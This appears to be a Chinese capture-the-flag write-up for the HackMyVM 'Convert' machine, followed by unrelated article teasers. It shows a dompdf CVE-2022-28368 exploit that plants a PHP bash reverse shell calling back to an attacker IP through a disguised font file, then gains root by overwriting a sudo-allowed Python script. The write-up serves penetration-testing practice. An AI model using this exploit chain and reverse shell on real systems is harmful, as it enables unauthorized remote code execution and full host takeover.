当前位置: 首页 > article >正文

HakcMyVM-Convert

信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.21.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDT Nmap scan report for 192.168.21.6 Host is up (0.00046s latency). MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.21.7 Host is up. Nmap done: 256 IP addresses (6 hosts up) scanned in 2.77 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -sV -p- 192.168.21.6 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:19 EDT Nmap scan report for 192.168.21.6 Host is up (0.00041s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2deb12u2 (protocol 2.0) 80/tcp open http nginx 1.22.1 MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds漏洞利用看一下80端口HTML-to-PDF转换器目录枚举┌──(kali㉿kali)-[~] └─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.21.6 Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.21.6 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: html,php,txt,jpg,png,zip,git [] Timeout: 10s Starting gobuster in directory enumeration mode /index.php (Status: 200) [Size: 1026] /upload (Status: 301) [Size: 169] [-- http://192.168.21.6/upload/] Progress: 9482032 / 9482040 (100.00%) Finished 尝试文件包含但是没有成功看了一下好像是CVE-2022-28368寻找一个.ttf字体文件将其改为.php文件并添加上shell┌──(kali㉿kali)-[~] └─$ find / -name *.ttf 2/dev/null ┌──(kali㉿kali)-[~] └─$ cp /usr/lib/gophish/static/font/fontawesome-webfont.ttf ./exp.php ┌──(kali㉿kali)-[~] └─$ echo ?php system(bash -c \bash -i /dev/tcp/192.168.21.7/4444 01\); ? ./exp.php在创建一个css文件┌──(kali㉿kali)-[~] └─$ cat exp.css font-face { font-family: exp; src: url(http://192.168.21.7:8080/exp.php); font-weight: normal; font-style: normal; }在创建一个html文件借此来触发┌──(kali㉿kali)-[~] └─$ cat exp.html !DOCTYPE html html head link relstylesheet hrefhttp://192.168.21.7:8080/exp.css /head body div stylefont-family: exp; New Font... /div /body /html开始利用┌──(kali㉿kali)-[~] └─$ python -m http.server 8080 网页触发http://192.168.21.7:8080/exp.html 成功触发 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.html HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.css HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.php HTTP/1.1 200 - 缓存文件名是基于字体名、样式、权重和MD5哈希生成的格式为字体族名_字体样式_md5哈希值.php计算一下MD5是多少┌──(kali㉿kali)-[~]└─$ echo -n “http://192.168.21.7:8080/exp.php” | md5sum12c572ccb65e130e206986e53354e0af -通常缓存在/vendor/dompdf/dompdf/lib/fonts/目录下尝试触发┌──(kali㉿kali)-[~]└─$ curl “http://192.168.21.6/dompdf/lib/fonts/exp_normal_12c572ccb65e130e206986e53354e0af.php”Warning: Binary output can mess up your terminal. Use “–output -”Warning: to tell curl to output it to your terminal anyway, orWarning: consider “–output ” to save to a file.┌──(kali㉿kali)-[~]└─$ nc -lvnp 4444listening on [any] 4444 …connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 41868bash: cannot set terminal process group (484): Inappropriate ioctl for devicebash: no job control in this shellevaconvert:/var/www/html/dompdf/lib/fonts$ ididuid1000(eva) gid1000(eva) groups1000(eva)# 权限提升evaconvert:/var/www/html$ sudo -lsudo -lMatching Defaults entries for eva on convert:env_reset, mail_badpass,secure_path/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,use_ptyUser eva may run the following commands on convert:(ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *//我们在eva目录下拥有写的权限evaconvert:/var/www/html$ cat /home/eva/pdfgen.pycat /home/eva/pdfgen.pyfrom os import pathfrom time import timefrom weasyprint import HTML, CSSfrom urllib.parse import urlparsefrom argparse import ArgumentParserfrom logging import basicConfig, INFO, error, info, exceptiondef prune_log(log_file, max_size1):try:log_size path.getsize(log_file) / (1024 * 1024)if log_size max_size:with open(log_file, ‘w’):passinfo(fLog file pruned. Size exceeded {max_size} MB.“)print(fLog file pruned. Size exceeded {max_size} MB.”)except Exception as e:print(fError pruning log file: {e})log_file ‘/home/eva/pdf_gen.log’prune_log(log_file)basicConfig(levelINFO, filenamelog_file, filemode‘a’,format‘%(asctime)s - %(levelname)s - %(message)s’)def is_path_allowed(output_path):blocked_directories [“/root”, “/etc”]for directory in blocked_directories:if output_path.startswith(directory):return Falsereturn Truedef url_html_to_pdf(url, output_path):block_schemes [“file”, “data”]block_hosts [“127.0.0.1”, “localhost”]blocked_directories [“/root”, “/etc”]try: start_time time() scheme urlparse(url).scheme hostname urlparse(url).hostname if scheme in block_schemes: error(f{scheme} scheme is Blocked) print(fError: {scheme} scheme is Blocked) return if hostname in block_hosts: error(f{hostname} hostname is Blocked) print(fError: {hostname} hostname is Blocked) return if not is_path_allowed(output_path): error(fOutput path is not allowed in {blocked_directories} directories) print(fError: Output path is not allowed in {blocked_directories} directories) return html HTML(url.strip()) html.write_pdf(output_path, stylesheets[CSS(stringpage { size: A3; margin: 1cm })]) end_time time() elapsed_time end_time - start_time info(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) print(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) except Exception as e: exception(fError: {e}) print(fError: {e})ifname “main”:parser ArgumentParser(description“Convert HTML content from a URL to a PDF file.”)parser.add_argument(“-U”, “–url”, help“URL of the HTML content to convert”, requiredTrue)parser.add_argument(“-O”, “–out”, help“Output file path for the generated PDF”, default“/home/eva/output.pdf”)args parser.parse_args() url_html_to_pdf(args.url, args.out)//创建一个恶意文件evaconvert:/var/www/html$ echo ‘import os; os.system(“/bin/bash”)’ /home/eva/exp.pyport os; os.system(“/bin/bash”)’ /home/eva/exp.py//将其把原来的文件替换掉evaconvert:/var/www/html$ mv /home/eva/exp.py /home/eva/pdfgen.pymv /home/eva/exp.py /home/eva/pdfgen.py//以root的身份执行我们的脚本pwned没任何作用只是为了符合带参数条件evaconvert:/var/www/html$ sudo /usr/bin/python3 /home/eva/pdfgen.py pwnedsudo /usr/bin/python3 /home/eva/pdfgen.py pwnediduid0(root) gid0(root) groups0(root)

相关文章:

HakcMyVM-Convert

信息搜集 主机发现 ┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.21.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDTNmap scan report for 192.168.21.6 Host is up (0.00046s latency). MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Orac…...

Python-docx页面布局踩坑实录:从‘首页页眉消失’到‘奇偶页错乱’的排错指南

Python-docx页面布局深度排错:从首页页眉消失到奇偶页错乱的实战指南 当我们需要用Python批量生成符合出版要求的文档时,python-docx库的页面布局功能往往成为开发者的"噩梦"。那些看似简单的页眉页脚设置,在实际操作中却可能引发一…...

机器学习特征工程实战:从原理到工具全解析

1. 特征工程的核心价值与挑战在机器学习项目中,数据科学家们常把80%的时间花在数据准备上,而特征工程正是这个过程中最具创造性的环节。好的特征能够显著提升模型性能,有时甚至比更换算法带来的提升更大。我曾参与过一个电商推荐系统项目&…...

Arm URSHL指令:多向量无符号舍入移位技术解析

1. Arm URSHL指令深度解析:多向量无符号舍入移位的艺术在Arm架构的SIMD指令集中,向量移位操作一直是性能优化的关键武器。今天我们要深入探讨的是SME2扩展中的URSHL(Unsigned Rounding Shift Left)指令——一种支持多向量并行处理…...

多元多步多站点时间序列预测在空气质量监测中的应用

1. 多元多步多站点时间序列预测问题概述时间序列预测在实际应用中面临着诸多挑战,这些挑战源于问题的复杂性特征:多输入变量、需要预测多个时间步长,以及需要对多个物理站点进行相同类型的预测。这类问题在空气质量预测、交通流量预测、电力负…...

保姆级教程:在RK3568上为PR2100K和GC2385配置camera3_profiles.xml

RK3568双摄配置实战:从camera3_profiles.xml到HAL层调试全解析 当RK3568平台的DTS和底层驱动调试完成后,如何让Android相机应用正确识别PR2100K和GC2385这对异构摄像头组合?本文将深入剖析camera3_profiles.xml的关键配置逻辑,以及…...

3步彻底清理显卡驱动:Display Driver Uninstaller完全指南

3步彻底清理显卡驱动:Display Driver Uninstaller完全指南 【免费下载链接】display-drivers-uninstaller Display Driver Uninstaller (DDU) a driver removal utility / cleaner utility 项目地址: https://gitcode.com/gh_mirrors/di/display-drivers-uninstal…...

Linux内核KASLR机制深度解析:从安全原理到实战调试的完整指南(地址空间、符号表、gdb)

1. KASLR机制的安全原理剖析 当你用dmesg查看内核日志时,可能会注意到这样一行信息:"Kernel Offset: 0x1e00000 from 0xffffffff81000000"。这串神秘数字背后,正是Linux内核的守护者——KASLR(Kernel Address Space La…...

wechat-need-web浏览器扩展解决方案:跨平台微信网页版访问技术实现

wechat-need-web浏览器扩展解决方案:跨平台微信网页版访问技术实现 【免费下载链接】wechat-need-web 让微信网页版可用 / Allow the use of WeChat via webpage access 项目地址: https://gitcode.com/gh_mirrors/we/wechat-need-web wechat-need-web是一款…...

如何让Blender成为你的3D打印创意工厂:3MF插件终极指南

如何让Blender成为你的3D打印创意工厂:3MF插件终极指南 【免费下载链接】Blender3mfFormat Blender add-on to import/export 3MF files 项目地址: https://gitcode.com/gh_mirrors/bl/Blender3mfFormat 你是否曾经在Blender中创造了一个惊艳的3D模型&#x…...

USB隔离

USB设备与主机之间常常因为接地电位差产生地环路电流,轻则导致数据传输不稳定、丢包误码,重则可能损坏昂贵的测试仪器。为了解决这个问题,设计了一款基于数字隔离技术的4路USB隔离电路,实现了信号与电源的双重隔离,同时…...

5分钟轻松掌握:WebSite-Downloader 完整网站离线下载指南

5分钟轻松掌握:WebSite-Downloader 完整网站离线下载指南 【免费下载链接】WebSite-Downloader 项目地址: https://gitcode.com/gh_mirrors/web/WebSite-Downloader 想要永久保存心爱的网站内容吗?WebSite-Downloader 是一款基于 Python 开发的强…...

从JDK动态代理到CGLIB:Spring事务@EnableTransactionManagement中proxyTargetClass参数的真实影响

从JDK动态代理到CGLIB:Spring事务EnableTransactionManagement中proxyTargetClass参数的真实影响 在Spring框架的事务管理机制中,EnableTransactionManagement注解的proxyTargetClass参数往往被开发者简单理解为"是否强制使用CGLIB代理"的开关…...

【架构实战】CQRS架构模式实战

一、CQRS概述 CQRS(Command Query Responsibility Segregation,命令查询职责分离)是一种架构模式: 核心思想: 命令(Command):修改数据的操作查询(Query)&…...

MATLAB R2022a + YOLOv5s:手把手教你搭建一个带中文界面的目标检测小工具(附完整代码)

MATLAB R2022a与YOLOv5s实战:打造智能目标检测可视化工具 在计算机视觉领域,目标检测技术正以前所未有的速度改变着我们与数字世界的交互方式。想象一下,你只需轻点鼠标,就能让计算机自动识别画面中的每一个物体——这正是YOLOv5…...

Qwen3.6-27B 开源:昇腾适配已到位,AtomGit AI 开放体验

270 亿参数稠密多模态模型 Qwen3.6-27B 正式开源。目前,昇腾生态已完成对 Qwen3.6-27B 模型的适配支持,相关模型文件与权重已同步上线 AtomGit AI,开发者们可直接获取并进行部署测试。 🔗 SGLang 部署:https://ai.atom…...

从AGC到传感器信号处理:峰值检测电路的5个实战应用场景与电路调试避坑指南

从AGC到传感器信号处理:峰值检测电路的5个实战应用场景与电路调试避坑指南 在工业测量、医疗设备和通信系统中,峰值检测电路如同一位沉默的"信号捕手",精准捕捉瞬息万变的电压极值。不同于教科书式的原理讲解,本文将带…...

终极指南:如何用FakeLocation实现应用级位置模拟,保护你的隐私与突破地理限制

终极指南:如何用FakeLocation实现应用级位置模拟,保护你的隐私与突破地理限制 【免费下载链接】FakeLocation Xposed module to mock locations per app. 项目地址: https://gitcode.com/gh_mirrors/fak/FakeLocation 你是否曾想过,为…...

前端模块热更新机制原理

前端模块热更新机制原理 在现代前端开发中,模块热更新(Hot Module Replacement,HMR)是一项关键技术,它允许开发者在不刷新整个页面的情况下实时更新代码,极大提升了开发效率。想象一下,每次修改…...

TNF-α蛋白的结构特征与信号转导机制研究

一、TNF-α蛋白的分子结构与存在形式肿瘤坏死因子α是一种对多种细胞类型具有多效作用的细胞因子,已被确定为炎症反应的主要调节因子,参与多种炎症和自身免疫性疾病的发病机制。从结构上看,TNF-α是由157个氨基酸组成的同型三聚体蛋白&#x…...

Windows虚拟显示器终极指南:3分钟免费扩展无限屏幕空间

Windows虚拟显示器终极指南:3分钟免费扩展无限屏幕空间 【免费下载链接】virtual-display-rs A Windows virtual display driver to add multiple virtual monitors to your PC! For Win10. Works with VR, obs, streaming software, etc 项目地址: https://gitco…...

VSCode容器化效率提升300%:从本地调试到K8s DevSpace的7个不可跳过的工程实践

更多请点击: https://intelliparadigm.com 第一章:VSCode容器化开发的核心价值与演进路径 VSCode 通过 Remote-Containers 扩展将本地编辑体验无缝延伸至容器运行时环境,从根本上重构了“开发即生产”的实践范式。其核心价值不仅在于环境隔离…...

给STM32裸机程序加点料:手把手教你用FreeRTOS创建第一个任务(附代码)

从裸机到RTOS:STM32多任务开发实战指南 引言 第一次接触RTOS的开发者往往会有这样的困惑:为什么简单的while(1)循环不能满足需求?当你的项目需要同时处理按键输入、LED显示、串口通信和传感器数据采集时,裸机编程的局限性就会暴露…...

从Docking到Gromacs:一个药物筛选新手的完整计算流程(含软件选择与避坑指南)

从Docking到Gromacs:药物筛选新手的全流程实战手册 刚踏入计算药物筛选领域时,最让人头疼的往往不是某个具体技术,而是如何把碎片化的工具串联成完整工作流。实验室里常遇到这样的场景:导师扔给你一个蛋白结构和化合物库&#xff…...

WinSW实战踩坑记:解决Windows Server上Jar服务‘找不到文件’的诡异问题

WinSW深度排障:破解Windows服务中Jar程序"找不到文件"的玄机 当你在Windows Server上部署Java服务时,是否遇到过这样的诡异场景:明明手动执行java -jar一切正常,但通过WinSW注册为服务后却频频报错"The system can…...

VSCode工业级开发环境搭建:从零到交付,7步实现毫秒级响应与企业级安全合规

更多请点击: https://intelliparadigm.com 第一章:VSCode工业级开发环境的战略定位与价值全景 VSCode 已超越轻量编辑器范畴,成为现代软件工程链路中承上启下的核心枢纽——它既是开发者每日交互最频繁的“数字工作台”,也是 CI/…...

解锁SillyTavern:打造有灵魂的AI角色对话体验

解锁SillyTavern:打造有灵魂的AI角色对话体验 【免费下载链接】SillyTavern LLM Frontend for Power Users. 项目地址: https://gitcode.com/GitHub_Trending/si/SillyTavern 你是否曾幻想与一个真正有"灵魂"的AI角色对话?不是那些机械…...

实战验证:爱搜索GEO营销系统如何为工业制造企业实现精准AI搜索优化

在传统搜索引擎优化(SEO)已进入存量竞争的红海时,一种基于生成式人工智能(AIGC)的全新流量战场——AI搜索优化(GEO)正在迅速崛起。对于企业而言,这不仅是技术升级,更是一…...

别再只会用imshow了!Matlab图像显示从入门到精通,一篇搞定灰度、RGB、二值图

Matlab图像显示艺术:从imshow基础到专业级可视化技巧 第一次接触Matlab图像处理时,很多人会惊讶于简单的imshow()背后隐藏着如此丰富的可能性。这个看似基础的函数,实际上是一把打开图像可视化大门的万能钥匙。本文将带你超越基础用法&#x…...

基于卷积神经网络的球罐结构损伤识别

基于卷积神经网络的球罐结构损伤识别 摘要:球形储罐(球罐)作为储存各类气体和液化气体的核心压力容器,广泛应用于石油、化工、冶金及城市燃气供应等领域,其结构安全直接关系到人员生命和财产安全。传统无损检测方法存在效率低、范围有限、对微小损伤敏感度低等问题,难以…...